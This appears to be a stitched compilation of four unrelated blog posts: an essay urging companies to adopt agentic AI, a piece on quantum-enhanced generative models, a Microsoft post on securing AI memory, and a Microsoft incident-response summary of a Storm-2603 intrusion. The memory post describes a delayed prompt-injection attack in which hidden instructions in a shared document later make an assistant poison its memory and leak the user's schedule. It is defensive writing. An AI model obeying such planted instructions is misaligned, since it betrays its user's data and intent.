The problem is that most organizations are investing all their attention — and most of their budget — in mastering era two while era three passes them by. They are training prompt engineers while their competitors are training agent architects. They are writing prompt libraries while their competitors are writing agent orchestration pipelines. They are proud of their AI literacy while their competitors are building AI-powered operations that will undercut them on cost, speed, and quality simultaneously.

💡 Key Distinction - Generative AI answers your questions. Agentic AI completes your goals. The difference is not incremental — it is architectural. One requires a human in the loop at every step. The other requires a human only at the goal-setting stage. Everything in between is autonomous.

3. The Prompt Ceiling: Where GenAI Stops and Real Work Begins

Every practitioner who has spent serious time with language models eventually runs into the same invisible ceiling. You can get remarkably good outputs from a well-crafted prompt. You can learn to give context, set tone, specify format, chain reasoning steps, and dramatically improve the quality of what you receive. Prompt engineering is a real skill, and it has genuine value.

But no amount of prompt engineering can make a chatbot actually do things in the world. It cannot log into your CRM. It cannot monitor a dataset and alert you when an anomaly appears. It cannot coordinate with your email system to send a follow-up three days after a proposal is sent. It cannot read incoming customer support tickets, triage them by severity, look up the customer’s account history, draft a personalized resolution, and log the interaction — all in one seamless, automated flow. Not without being architected into an agent system with tools, memory, and a runtime environment.

The prompt ceiling is the point at which the conversational model runs out of usefulness and a different architecture must take over. And the majority of high-value business processes live above that ceiling. Let’s be specific about what lives above it:

Processes That Require Multi-Step Coordination

Most real business workflows are not single-step. Onboarding a new client involves intake, document collection, system provisioning, notification to multiple teams, scheduling, and follow-up — often across days or weeks. A prompt can help you draft the onboarding email. An agent can run the entire onboarding workflow, adapting at each step based on what happened in the last one.

Processes That Require Real-Time Data Access

A language model’s training data has a cutoff date. A language model with tool access can query live databases, pull current market data, read recent news, and synthesize it with contextual intelligence. The model itself hasn’t changed. The architecture around it has unlocked an entirely different capability class.

Processes That Require Persistence and Memory

A chat session is stateless the moment you close the window. An agent system with proper memory architecture can maintain context across days, weeks, and months. It remembers what it did, what worked, what the user prefers, and what’s pending. This transforms the model from a disposable conversation partner into something closer to a permanent digital colleague.

Processes That Require Judgment Under Uncertainty

One of the most underappreciated capabilities of modern agent frameworks is their ability to decompose complex, ambiguous goals into tractable sub-tasks, execute them in the right sequence, handle failures gracefully, and escalate to humans only when genuinely necessary. This is not prompt engineering. This is system design — and it is where the real competitive moats are being built.

⛔ Reality Check - {If your “AI strategy” consists of a subscription to a chat interface and a Slack channel where people share clever prompts, you do not have an AI strategy. You have an AI hobby. And while you are enjoying the hobby, your competitors are building the factory.

4. The Hidden Cost of Standing Still

Organizations often frame the decision to delay AI automation as a conservative, prudent choice. “We want to make sure we get the fundamentals right.” “We’re focused on responsible AI adoption.” “We’ll wait until the technology matures.” These statements sound reasonable. They feel like risk management. They are, in practice, a sophisticated form of competitive self-harm.

The costs of standing still are real, but they are diffuse and slow-burning — which is exactly why they are so dangerous. No single quarter looks catastrophic. No single competitive loss is obviously attributable to AI lag. The damage accumulates quietly, in the gap between your costs and your competitors’ costs, in the speed differential between your deliverables and theirs, in the talent pipeline that increasingly favors companies doing interesting AI work over companies that have a “pilot program.”

The Cost Compressor

When a competitor deploys agentic workflows across their operations, they are not just doing things faster — they are structurally reducing the cost per unit of output. A company that can process 10,000 customer inquiries per day with 10 agents and a fleet of AI systems has a fundamentally different cost structure than a company doing the same volume with 80 human agents and a chat tool. The first company can undercut on price, invest more in product, or simply pocket the margin. Every quarter that passes without closing this gap is a quarter in which the structural cost disadvantage compounds.

The Speed Asymmetry

Speed in business is not just about moving fast. It is about iteration velocity — how quickly you can run experiments, learn from them, and incorporate those learnings. An organization with agentic AI infrastructure can run tests, generate variants, analyze results, and deploy changes in a continuous loop that human-driven organizations simply cannot match. Over time, this creates a learning curve advantage that is nearly impossible to overcome through brute-force hiring.

The Talent Gravity Shift

The best AI engineers, researchers, and product builders have options. They choose their employers partly based on the quality and ambition of the technical environment. Organizations that are still debating whether to move beyond chatbots will increasingly struggle to attract the talent needed to make that move. Meanwhile, companies already doing agentic work are attracting the best people, who in turn accelerate the work. This is a self-reinforcing cycle that only gets harder to break the longer it runs.

The Institutional Knowledge Trap

Here is a subtle but devastating risk that almost nobody discusses: organizations that over-invest in prompt-based workflows without building systematic AI memory and automation are at risk of building a new kind of institutional knowledge trap. When key employees leave, they take their prompt libraries with them. The “AI expertise” in these organizations is personal rather than institutional. Agents with memory, structured workflows, and documented orchestration logic, by contrast, represent institutional knowledge that persists regardless of personnel turnover.

5. What Agentic AI Actually Looks Like

Abstract warnings about “falling behind” are useful for generating alarm but not for generating action. So let’s get concrete. What does agentic AI actually look like when it is deployed in the real world? What is the thing you are not building while you refine your prompts?

Example: The Autonomous Research Analyst

A traditional workflow: an analyst receives a request for competitive intelligence on three emerging startups. She spends two days browsing websites, reading press releases, pulling LinkedIn data, scanning news, compiling notes, and writing a summary. She produces a good report. She is exhausted. Three months later, the process repeats.

An agentic workflow: a research agent is given the same request. It decomposes the task into sub-agents — one for each company. Each sub-agent browses the web, pulls funding data from public APIs, scrapes product pages, reads recent press, checks job postings as signals of growth priorities, and synthesizes findings into structured JSON. A synthesis agent assembles the sub-reports, identifies patterns and contradictions, generates a structured report, flags areas of uncertainty, and delivers it to a shared dashboard — all within two hours. When new information appears about any of these companies, the monitoring layer triggers an automatic update. The analyst’s job shifts from data gathering to interpretation and decision-making.

Example: The Autonomous Sales Development System

A traditional workflow: an SDR identifies a lead, researches them manually, writes a personalized outreach email, sends it, waits, follows up, logs the interaction, and moves to the next. She can touch perhaps 30 quality prospects per day.

An agentic workflow: a prospecting agent continuously monitors trigger events — new funding rounds, executive hires, product launches — across a target account list. When a trigger fires, a research agent pulls all available context on the company and the specific contact. A personalization agent crafts an outreach message grounded in that context. A scheduling agent sends the email at the optimal time. A tracking agent monitors open and click events and, based on behavioral signals, decides whether to send a follow-up and what it should say. The SDR reviews the conversations that warm up and focuses on the ones that need human nuance. The system surfaces 300 quality conversations per day instead of 30.

Example: The Autonomous Code Review Pipeline

Developers submit pull requests. An agent reads the diff, understands the intent from the PR description and linked ticket, checks the changes against coding standards, runs static analysis, identifies potential bugs and security vulnerabilities, generates a plain-English review comment, suggests specific fixes, and labels the PR by risk level. Senior engineers spend their time reviewing the high-risk PRs flagged by the agent and mentoring junior developers, rather than reading routine diffs. Throughput doubles. Code quality improves. Senior engineers are no longer the bottleneck.

# Simplified agentic orchestration pattern (LangGraph / similar)

graph = StateGraph(AgentState)

# Nodes = discrete agent capabilities
graph.add_node("planner", plan_task)
graph.add_node("researcher", browse_and_retrieve)
graph.add_node("executor", run_tool_calls)
graph.add_node("reviewer", self_critique_output)
graph.add_node("human", escalate_if_needed)

# Edges = decision logic between steps
graph.add_conditional_edges("reviewer", route_on_confidence, {
"retry": "executor",
"escalate": "human",
"done": END
})

These are not science fiction. These are systems being built and deployed today, at real companies, using frameworks like LangChain, LangGraph, AutoGen, CrewAI, and the native agent APIs offered by every major model provider. The engineering required is not trivial, but it is not exotic either. A competent software engineering team with AI experience can begin building these systems in weeks, not years.

6. The AI Maturity Ladder

One of the most useful frameworks for diagnosing where your organization sits — and understanding what the next step looks like — is an AI maturity model. Not the kind that consultants use to justify billable hours, but a practical, honest ladder that maps capabilities to business impact.

Level 1 — Ad Hoc Experimentation

Individual employees use AI tools personally and informally. No institutional coordination. Productivity gains are individual and untracked. Risk: the organization gets no leverage from its AI adoption because it’s entirely fragmented.

Level 2 — Structured Prompt Usage (Most organizations today)

Teams adopt shared AI tools. Prompt libraries are maintained. Training programs run. AI assistants integrated into existing tools (email, IDE, CRM). Productivity gains are real but bounded. The human is still the engine; AI is the turbocharger.

Level 3 — Workflow-Embedded AI

AI is integrated into specific workflows with defined input/output contracts. Basic automation (triggered summaries, classification, routing). Humans are still required at decision points, but routine steps are automated. Meaningful throughput gains begin here.

Level 4 — Agentic Systems

Multi-step, tool-using agents handle complete task categories end-to-end. Human involvement is supervisory rather than operational. Systems have memory and can adapt. Structural cost advantages begin compounding. Competitive moats form here.

Level 5 — Orchestrated Agent Networks

Multiple specialized agents collaborate on complex, long-horizon goals. The organization functions as a human-AI hybrid entity. New products and services are themselves agent-powered. The company’s competitive posture is fundamentally different from any purely human-staffed competitor.

The uncomfortable truth is that the majority of organizations — including many that pride themselves on being “AI-forward” — are sitting at Level 2. They have invested meaningfully in tools and training. They have generated genuine productivity improvements. And they have essentially plateaued. The jump from Level 2 to Level 3 requires not better prompts but better engineering — and a fundamentally different mindset about what AI is for.

The Brutal Comparison

It helps to put the two paradigms side by side, without varnish. Here is what the prompt-first organization and the agent-first organization look like when measured on the dimensions that matter.

7. The Psychology of Prompt Comfort

If agentic AI is clearly superior in so many dimensions, why do so few organizations move toward it? The answer is partly technical — agent systems are genuinely harder to build than prompt interfaces — but mostly psychological and organizational. Understanding these barriers is essential to overcoming them.

The Familiarity Fallacy

Chat interfaces are intuitive. They map onto the most natural form of human communication: conversation. Typing a question and getting an answer feels familiar, controllable, and safe. Agentic systems, by contrast, feel abstract and opaque. Something is running in the background, making decisions, taking actions. For many people — particularly those without engineering backgrounds — this feels not like leverage but like loss of control. The discomfort is real, but it is also the same discomfort that early users of spreadsheets felt when they realized the cell formulas were running calculations “on their own.” The discomfort is a symptom of unfamiliarity, not genuine danger.

The Mastery Trap

Human beings have a deep psychological attachment to skills they have worked hard to develop. The people in your organization who have invested months in becoming excellent prompt engineers have a genuine stake in the status and value of that skill. Telling them that the frontier has moved — that orchestrating agents is the new literacy — requires them to acknowledge that their hard-won expertise is rapidly depreciating. This is psychologically painful, and it generates subtle organizational resistance to change that is difficult to name and therefore difficult to address.

The Measurement Problem

Prompt-based productivity gains are easy to measure and demonstrate. “Our team used AI to cut report generation time from 8 hours to 90 minutes” is a clean, compelling story. Agentic infrastructure gains are harder to quantify, especially in the early stages, because they show up not in individual task metrics but in system-level throughput, error rates, and cost per unit over time. This makes it harder to justify the investment in internal conversations and harder to celebrate progress — which in turn makes it harder to sustain organizational momentum.

The “Good Enough” Seduction

This may be the most dangerous psychological trap of all. When prompt-based AI delivers a 30% productivity improvement, it is very easy to feel satisfied. Thirty percent is real. Thirty percent is noticeable. Thirty percent sounds like transformation. But if your competitor is delivering a 200% or 400% improvement through agentic infrastructure, your 30% is not just insufficient — it is the sound of the gap widening. “Good enough” is not a stable equilibrium in a competitive landscape. It is a slowly tightening vice.

8. Dismantling the Objections

Executives and practitioners who are resistant to moving beyond prompt-based AI tend to reach for a standard toolkit of objections. These objections are not entirely without merit, but they are consistently overstated, and they deserve to be examined clearly.

“Agents are unreliable. They hallucinate and make mistakes.”

This is true, but it is the wrong frame. The question is not whether agents make mistakes — it is how their error rate compares to the human process they are replacing, and whether errors can be caught and corrected systematically. Human processes make mistakes too, and they make them in ways that are harder to audit, monitor, and improve. A well-designed agent system with verification steps, human-in-the-loop escalation for edge cases, and systematic logging often achieves lower error rates on routine tasks than human-only processes — not because agents are infallible, but because their failure modes are observable and addressable in ways that human errors often are not.

“We don’t have the engineering talent to build agent systems.”

This was a more credible objection two years ago than it is today. The tooling for building agent systems has improved dramatically. Frameworks like LangGraph, CrewAI, and AutoGen have abstracted away enormous amounts of complexity. Cloud providers offer managed agent infrastructure that requires dramatically less custom engineering. The talent required is still real, but it is far more accessible than the objection implies — and organizations that delay building this capability will find it progressively harder to attract the talent needed to build it, because the best people want to work on the frontier, not catch up to it.

“The regulatory and governance risks are too high.”

This is the most legitimate objection, but it applies selectively. There are domains — healthcare decision-making, financial advice, legal determinations — where autonomous AI action requires extraordinary care and where robust human oversight is genuinely necessary. But the majority of business processes do not operate in these sensitive domains. The regulatory risk of automating your competitor research, your content generation pipeline, your internal IT ticketing, or your code review workflow is minimal. Blanket risk aversion applied uniformly across all use cases is not governance — it is avoidance with a governance label on it.

“We need to get the basics right before we move to advanced automation.”

This sounds prudent. It is, in practice, often an indefinite deferral strategy. The basics never feel entirely right. There is always another training program to run, another integration to complete, another policy to write. The organizations that have successfully moved to agentic AI did not wait until their prompt practice was perfect — they built agent systems and learned from them, improving in parallel rather than sequentially. The idea that maturity in one stage is a prerequisite for beginning the next is comforting but false. The maturity you need for agents comes from building agents, not from perfecting prompts.

9. A Practical Roadmap: From Prompts to Agents

Enough diagnosis. What should you actually do? The path from prompt-centric AI usage to agentic infrastructure is not a single leap — it is a series of deliberate steps, each of which delivers its own value while building capability for the next. Here is a practical framework for making that journey.

1

Map Your Highest-Volume Repetitive Processes

Before you build anything, identify the processes in your organization that are repetitive, high-volume, rule-governed, and currently consuming significant human time. These are your best candidates for early agentic automation. Do not start with your most complex, most sensitive processes — start with the ones that are tedious and procedural. Triage of inbound emails, summarization of meeting transcripts, first drafts of standardized documents, data extraction from unstructured inputs. These are tractable and high-ROI starting points.

2

Build One Agent End-to-End — Any Agent

The single most important thing you can do is ship one complete agent system, however small. Not a proof of concept that lives in a Jupyter notebook. An actual system that runs on a schedule, uses real tools, produces real outputs, and is used by real people. The learning from building and operating that system is irreplaceable. It will surface the questions about memory, tool design, error handling, and human escalation that no amount of theoretical planning can anticipate. Pick something tractable. Ship it. Learn from it.

3

Invest in an Agent Infrastructure Layer

Rather than building each agent in isolation, invest early in shared infrastructure: a tool registry that agents can access, a memory store that persists context across sessions, an observability layer that logs agent actions and outcomes, and a human escalation pathway that is lightweight and reliable. This infrastructure investment pays dividends across every subsequent agent you build, and it is the difference between having a collection of isolated automations and having a genuine agentic capability platform.

4

Redesign Roles, Not Just Workflows

The organizational change required to get value from agentic AI is more significant than most leaders anticipate. It is not enough to automate a step in an existing workflow. The workflow itself needs to be redesigned around the new capability. And more fundamentally, human roles need to be reimagined. The analyst who used to gather data needs to become the analyst who designs the agent that gathers data and spends her time on interpretation, strategy, and judgment — the things that genuinely require human intelligence. This redesign is uncomfortable and often meets resistance. It is also the whole point.

5

Build an Agent Evaluation Practice

One of the biggest gaps in most organizations’ AI practice is the absence of systematic evaluation. With prompt-based AI, evaluation is informal — a human reads the output and judges whether it is good. With agentic AI, you need systematic evaluation: benchmarks for agent accuracy, latency, and cost; monitoring for failure modes; regression testing when you update the agent; and a feedback loop that continuously improves performance. This is a software engineering practice, and it needs to be owned by people with engineering rigor, not handed off to whoever is enthusiastic about AI this week.

6

Create an Agentic Culture, Not Just Agentic Tools

The organizations that get the most from agentic AI are not the ones that have the best tools — they are the ones where every team member habitually asks “could an agent do this?” when they encounter a repetitive task. This culture is built through leadership example, through visible successes, through training that focuses not on prompt syntax but on systems thinking, and through a reward structure that recognizes people who identify and automate inefficiencies rather than just those who perform them efficiently. Prompt culture celebrates the craftsman. Agentic culture celebrates the architect.

10. The Future Belongs to the Orchestrators

There is a phrase that has been circulating in AI research circles for the past year: “the model is a commodity; the system is the moat.” It captures something important about where competitive advantage in the AI era is actually located. The underlying language models — GPT-4o, Claude, Gemini — are becoming increasingly commoditized. Their capabilities are remarkable, but they are available to everyone with an API key and a credit card. The raw intelligence is not the differentiator.

What differentiates is the system around the model. The orchestration logic that decides which tool to call when. The memory architecture that maintains context across long-running tasks. The tool ecosystem that connects the model to real systems of record. The evaluation pipeline that continuously improves agent performance. The organizational capability to identify new use cases and deploy agents against them quickly. These are the things that compound. These are the things that are genuinely hard to copy.

Think of it this way: in the early days of the internet, having a website was a differentiator. Then having a good website became table stakes. Then having a sophisticated web application became the differentiator. Then sophisticated applications became table stakes, and having massive scale, network effects, and data flywheels became the differentiator. We are at an analogous inflection point with AI. Having access to a language model is already table stakes. Using it well via prompting is almost table stakes. The differentiator — for the next window, which may be shorter than you think — is having the agentic infrastructure that turns model intelligence into systematic operational advantage.

The companies that will own their categories in five years are, right now, not primarily focused on teaching employees to prompt better. They are hiring AI engineers and agent architects. They are building internal tool ecosystems. They are mapping their operations for automation opportunities. They are running agent pilots in three or four domains simultaneously, learning fast, and scaling what works. They are, in other words, building the factory — while everyone else is debating which hand loom technique is most efficient.

The orchestrators — the companies and individuals who learn to direct networks of agents, design the systems that make them reliable and improving, and integrate them deeply into operations — will have capabilities that dwarf what any human team can produce. Not because they are smarter, but because they have multiplied their intelligence across an army of tireless, fast, parallel digital workers. The question is not whether this future is coming. It is already here, for those who have moved to meet it. The question is only whether your organization will be among the orchestrators or among the orchestrated.

11. Conclusion: The Clock Is Running

Let’s return, for a moment, to the photograph of the textile worker. The point of that image is not that she was foolish or lazy or lacked foresight. She was none of those things. The point is that the technological shift happening around her was so rapid, and the benefits of her existing skills so immediate, that the rational choice in any given moment was to keep doing what she was good at. The irrational choice — the choice that required imagination and risk tolerance and a willingness to feel temporarily incompetent — was to step away from the loom she knew and begin learning the power-loom she did not.

Generative AI prompting is your hand loom. You are good at it. It delivers real value. Every day you use it, you get slightly better at it. And every day you spend getting better at it, the organizations building agentic infrastructure are pulling further ahead in ways that are not yet fully visible but will be, very soon, undeniable.

The good news — and there is genuine good news here — is that the window has not closed. The technology for building agent systems is accessible. The frameworks are maturing rapidly. The playbooks, while not yet standardized, are becoming clearer. The talent required, while not trivial to find, is findable. Organizations that move decisively now can close the gap. But “decisively” is the operative word. Decisively does not mean commissioning another study. It does not mean adding “agentic AI” to next year’s strategic planning agenda. It means assigning a capable team, defining a specific starting point, and building something real within the next quarter.

The organizations that will look back on this moment with satisfaction are the ones that resisted the comfort of prompt mastery and pushed through to the discomfort of agent architecture. The ones that accepted the temporary competence gap of learning a new paradigm rather than harvesting diminishing returns from the old one. The ones that asked not “how do we get better at using AI?” but “how do we build systems where AI works for us, continuously, without us having to ask?”

That question — sustained, serious, resourced, and acted upon — is the difference between leading the next decade and spending it catching up. The clock is running. The question is whether you are listening to it.

🚀 Your Starting Point - Choose one high-volume, repetitive process in your organization. Write down every step it requires. Identify which steps require genuine human judgment and which are procedural. Then ask: what would it take to hand the procedural steps to an agent? That question, answered honestly and acted on quickly, is how the journey from prompt user to agent builder begins.

Generative AI has already transformed how we create—turning text prompts into photorealistic images, symphonies, or novels faster than you can say “DALL-E.” But it’s hitting walls: training is compute-hungry, outputs can be repetitive or biased, and sampling diverse, high-quality results in vast possibility spaces remains slow.

Enter quantum computing. With its superposition, entanglement, and inherent probabilistic nature, quantum hardware promises to supercharge models like GANs (Generative Adversarial Networks) and diffusion models. We’re talking faster convergence, richer diversity, and creativity that feels truly alien. This isn’t sci-fi—researchers are already demonstrating hybrid quantum-classical systems outperforming pure classical ones in image generation, molecular design, and more.

Why Quantum? The Superpowers for Generative Models

Classical computers process bits one at a time. Quantum bits (qubits) can exist in multiple states simultaneously (superposition) and correlate instantly across distances (entanglement). This makes them natural for exploring enormous probability distributions—the heart of generative AI.

• Better Randomness and Sampling: Classical noise is pseudo-random. Quantum measurements provide true randomness. Studies show injecting quantum randomness into GANs improves realism in generated images.

• Handling High-Dimensional Spaces: Diffusion models (like those powering Stable Diffusion) gradually denoise data. Quantum versions, such as Quantum Denoising Diffusion Probabilistic Models (QuDDPMs), leverage quantum noise resilience and parallel exploration for more stable, efficient training—especially promising as classical diffusion scales poorly.

• Hybrid Approaches Dominate (for Now): Fully fault-tolerant quantum computers are years away (NISQ era limitations), so hybrid QGANs—quantum generator + classical discriminator—are leading. IonQ’s work on steel microstructure images showed quantum-enhanced GANs scoring higher quality in up to 70% of cases.

Supercharging Images: From Pixels to Quantum Masterpieces

Imagine generating not just variations, but entirely novel artistic styles or photorealistic scenes with quantum-level diversity. QGANs replace parts of neural nets with quantum circuits, using parameterized quantum circuits (PQCs) for the generator.

Early demos on MNIST digits and beyond show quantum models capturing complex patterns more parameter-efficiently. Recent quantum diffusion models are tackling facial image generation on complex datasets. The result? Faster iteration, less mode collapse (where GANs get stuck repeating similar outputs), and outputs that explore the “long tail” of creativity.

Music and Text: Composing in Quantum Harmony

• Music: Quantum interference and Markov chains driven by quantum states enable real-time improvisation or novel compositions. Quantum generative models can sample intricate probabilistic sequences for melodies or harmonies that classical models might miss.

• Text and Beyond: While LLMs are classical beasts, quantum-enhanced generative models could optimize embeddings or sampling in latent spaces for more coherent, diverse narratives. Quantum circuits for state tomography and data generation are already feeding into broader AI pipelines.

Applications extend to drug discovery (quantum gen models outperforming classical for viable molecules) and materials science—proving the tech’s real-world bite.

Challenges on the Horizon

Don’t cancel your GPU subscription yet. NISQ devices are noisy and limited in qubits. Training hybrid models requires clever error mitigation, and scaling to useful sizes demands breakthroughs in error correction. Full quantum advantage for massive generative tasks (think billions of parameters) is still emerging, with Google Quantum AI showing promising “generative quantum advantage” proofs.

Energy and accessibility are other hurdles—quantum hardware isn’t in your basement (yet).

The Dawn of Quantum Creativity

Quantum-enhanced generative AI could democratize ultra-high-fidelity creation: instant, diverse content for artists, musicians, writers, and industries. Picture AI agents dreaming up entire worlds with quantum speed, or personalized medicine via quantum-designed molecules.

As hybrid systems mature and fault-tolerant quantum hardware arrives, we’ll look back on today’s classical generative AI as quaint. The qubits are coming—and they’re ready to create.

What do you think—will quantum make AI too creative, or just right? Drop your thoughts below.

AI memory transforms an AI system from a stateless tool into a learning collaborator.  That unlocks powerful experiences, but it also increases the attack surface of the AI system. Without memory, attackers need to achieve their objective in a single prompt.  With AI memory, they can shape behavior gradually over time or plant memories that influence agent reasoning after the original context is gone and user awareness is lower.

Microsoft takes a defense-in-depth approach to protect AI memory spanning every layer of the stack: storage, retrieval, model interaction, and user control.

What AI memory is (and why it matters)

 AI systems use memory to retain and recall information across interactions. This information is then used to shape future behavior. This enables:

1. Personalization: Agents gain a deep understanding of the user’s preferences.  This provides continuity across interactions.
2. Agentic coherence: Agents build durable domain knowledge that strengthens performance. As AI systems evolve, this persistent state becomes central to both capability and correctness.

What is an agent memory attack?

AI memory serves two roles. It stores high-value user information and must be protected like customer data. It also shapes agent behavior and drives tool calls and must be governed with the same rigor as any system that can act. Memory governance is also challenging since memory events usually happen asynchronously from user interactions, changing traditional human in the loop patterns.

AI memory changes the threat model. Without memory, attackers need to “win” in a single prompt. Using AI memory, an attacker can stage an attack over time. Once compromised, memory can trigger behaviors outside of their original context. Since AI memory attacks happen outside of their original context, defenses are often lower and forensics are harder.

Building safe AI memory is one of the most consequential challenges in AI. It requires balancing personalization, capability, privacy, security, and governance.

Scenario: delayed tool execution through adversarial memory poisoning

The following is a hypothetical scenario illustrating this class of risk. While simplified for clarity, it reflects patterns observed in real-world research. Microsoft designs protections to detect and mitigate these patterns as they evolve:

A user opens a shared document. Its formatting contains hidden instructions embedded by an attacker intended for the AI assistant: a directive to exfiltrate the user’s schedule. The assistant processes the document but takes no immediate action.

Days later, in an unrelated conversation, that message triggers the dormant malicious instructions from the earlier session, causing the assistant to update its memory with attacker-defined content.  The attacker now gets all updates to the user’s schedule.

This is delayed tool invocation: the attack’s power lies in the temporal gap between exposure and execution.

How Microsoft approaches memory security in Microsoft 365

Memory Creation

Memories pass through sanitization checks on write. Proprietary Microsoft prompt-injection classifiers inspect content for malicious input and strip it before anything is written.  M365 Copilot is designed to run Task Adherence checks on every explicit memory write. Task Adherence identifies discrepancies such as misaligned tool invocations relative to user intent, mitigating prompt injection impact for the memory tool call.  Personalization using AI memory can be controlled with tenant level policy.

Memory Storage

Once stored, memories are governed by the data policies available across M365 like Data Subject Requests (DSR) and tenant isolation.  They follow the same security and compliance policies as other mailbox data, such as Customer Lockbox and encryption at rest.

Observability

M365 Copilot records when a memory is updated to organizational audit logs. The goal is end-to-end traceability: from the source content Copilot processed, to what it chose to remember, to how that memory influenced later interactions.

Today, SOC analysts can join the MemoryUpdated field, available in Defender Advanced Hunting, Defender Sentinel, and Azure Portal Sentinel Analytics, with their existing analytics to triage incidents and build new alerts on memory activity.

In summary:

Microsoft continues to invest in AI memory security as an active, iterative program. The protections and visibility described here reflect capabilities available today, with continued hardening and enrichment underway. Capabilities described are subject to configuration, licensing, and service availability. The following section shares the framework guiding our investments.

This case study is based on MSRC cases from Johann Rehberger (first finder), Håkon Måløy, and Gal Zror.  We are grateful to the security researchers who engaged with us and informed better memory design practices through coordinated vulnerability disclosure. Their work strengthens the systems customers rely on.

A guiding framework for building safe AI memory

AI memory requires balancing personalization, capability, privacy, security, and governance.

Our AI memory strategy is guided by design principles for building safe memory systems. These principles address core failure modes that can undermine trust, security, and operability at scale.

1. Establish intent and provenance before persistence: Memory can be influenced indirectly by untrusted content, and without provenance it becomes difficult to assess whether stored information is trustworthy, appropriate to retain, or safe to use later. Memory should only be written when it reflects legitimate user intent, is aligned to the service’s purpose, and carries clear metadata about where it came from.
2. Enforce boundaries outside the model: Memory access and isolation should be controlled by deterministic systems, not model instructions. Prompting alone is not a reliable security boundary; strong enforcement prevents sensitive memory from leaking across users, agents, or tenants.
3. Treat retrieval as a risk decision: Memory that was safe to store can become stale, manipulated, or misleading over time. Uncritical retrieval can directly affect agent behavior. Treat retrieved candidate context and re-evaluated for relevance, freshness, and tampering before use.
4. Provide full lifecycle visibility for security teams: Without auditability and chain of custody, memory cannot be reliably investigated, trusted, or safely expired during incident response. Security teams need clear records of what changed, when, why, from where, and access attempts.
5. Keep users in control: Users should be able to understand how memory is shaping their experience and have meaningful controls to review, edit, and delete it. Transparency and control are essential to user trust, and they help ensure memory remains aligned with user expectations over time.

Taken together, these principles reflect where we’re headed: advancing agent capability and control together. Getting that balance right is one of the hardest challenges in the industry, but we believe the agents that scale furthest will be the ones that are also trustworthy, governable, and resilient by design.

Key takeaways

• Memory turns transient threats into persistent ones.
• You can’t secure what you can’t see. Full lifecycle logging of memory operations is the foundation of agentic safety.
• Attackers are already thinking across turns. Single-turn defenses are insufficient for AI memory systems.
• Memory expands the blast radius.
• Microsoft treats memory protections, auditability, and governance as an integral part of the broader trust and compliance architecture.
• Microsoft continues to invest in AI memory security as an active, iterative program. The protections and visibility described here reflect capabilities available today, with continued hardening underway to address emerging threats.

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.   

• Explore how to build and customize agents with Copilot Studio Agent Builder 
• Microsoft 365 Copilot AI security documentation 
• How Microsoft discovers and mitigates evolving attacks against AI guardrails 
• Learn more about securing Copilot Studio agents with Microsoft Defender  
• Evaluate your AI readiness with our latest Zero Trust for AI workshop.
• Learn more about Protect your agents in real-time during runtime (Preview)

The post Guarding AI memory appeared first on Microsoft Security Blog.

What began as a routine ransomware investigation quickly revealed something far more complex. In this ninth cyberattack series report, DART details how a single intrusion uncovered parallel activity from two unrelated threat actors operating simultaneously—blending tactics, obscuring signals, and challenging traditional assumptions about how multi-stage intrusion campaigns unfold across hybrid environments. Read on to learn more or access the full report.

What happened?

The investigation revealed a multi-stage intrusion that blended familiar ransomware activity with quieter, more deliberate techniques designed to establish deep and lasting access. DART found that Storm-2603 had been targeting on-premises SharePoint servers since mid-2025, exploiting known vulnerabilities while simultaneously probing for additional entry points through reconnaissance activity—such as requests for sensitive configuration files often used to validate local file inclusion weaknesses. In this case, initial access was likely attempted through a separate vulnerability, with requests for files like win.ini and web.config, indicating probing for local file inclusion. While exploitation wasn’t confirmed, the timing and activity suggest reconnaissance for entry points.

Once inside, the threat actor shifted focus to persistence and control. Using legitimate tools to blend in, they deployed Velociraptor with SYSTEM-level privileges to map the environment, then established multiple remote access channels through Cloudflare tunneling, Zoho Assist, and Secure Shell (SSH) connections configured through Visual Studio Code. Velociraptor, a legitimate forensic and incident response tool, was deployed by the threat actor to map the environment and operate with high-level privileges—blending malicious activity with trusted administrative behavior. Privilege escalation followed, with new local and domain administrator accounts created to maintain access, while defense evasion techniques—including the use of a vulnerable driver to tamper with memory and disable protections—helped reduce their visibility.

As DART correlated activity across the environment, investigators uncovered signs of a second, unrelated threat actor operating in parallel. Malicious dynamic link library (DLL) sideloading and custom backdoors—techniques not associated with Storm-2603—introduced an additional layer of complexity, obscuring attribution and complicating detection. Together, these overlapping activity streams enabled sustained access while masking the full scope of the intrusion.

How did Microsoft respond?

DART moved quickly to contain the active intrusion involving multiple threat actors and stabilize the environment, activating a structured response playbook focused on limiting threat actor impact and restoring control. By correlating telemetry across identities, endpoints, and cloud resources, responders established a unified view of the intrusion, enabling them to detect abnormal behavior, uncover credential misuse, and track threat actor activity as it evolved. Continuous coordination with the customer, including daily briefings, ensured that containment actions were timely, aligned, and effective in reducing further threat actor movement.

At the same time, collaboration with Microsoft Threat Intelligence provided critical context that reshaped the investigation. By connecting incident data with broader intelligence, DART identified two distinct threat actors operating simultaneously within the same environment—each masking the other’s activity and complicating detection. Beyond containment, the team delivered targeted guidance to strengthen the organization’s security posture, helping close visibility gaps and improve resilience against future identity compromise and ransomware-driven attacks.

What can customers do to strengthen their defenses?

This case underscores the importance of closing common gaps across exposure, identity, and visibility. Organizations should prioritize rigorous patching and vulnerability management—especially for internet-facing systems—to reduce the risk of initial access. At the same time, strengthening identity security is critical to limiting threat actor escalation and persistence. At a high level, customers can avoid similar cyberattacks by focusing on ways to:

• Establish broad, continuous visibility:
  Deploy endpoint protection widely and retain telemetry centrally to support detection, investigation, and correlation.
• Monitor and restrict trusted tools:
  Validate and oversee the use of remote access, tunneling, and administrative tools that threat actors may exploit for persistence and lateral movement.
• Prepare for rapid, coordinated response:
  Maintain tested incident response playbooks and ensure teams can quickly isolate compromised users, devices, and access paths to reduce dwell time.

Today’s modern cyberattacks can quickly evolve beyond a single incident-blending tactic, spanning environments, and even involving multiple threat actors operating in parallel. For security teams, the takeaway is clear: isolated signals rarely tell the full story. Organizations that invest in connected telemetry, coordinated response, and operational preparedness will be better positioned to detect adversary activity such as credential abuse and lateral movement earlier, contain active intrusions faster, and limit their overall impact.

What is the Cyberattack Series?

In our Cyberattack Series, customers discover how DART investigates unique and notable attacks. For each cyberattack story, we share:

• How the cyberattack happened.
• How the breach was discovered.
• Microsoft’s investigation and eviction of the threat actor.
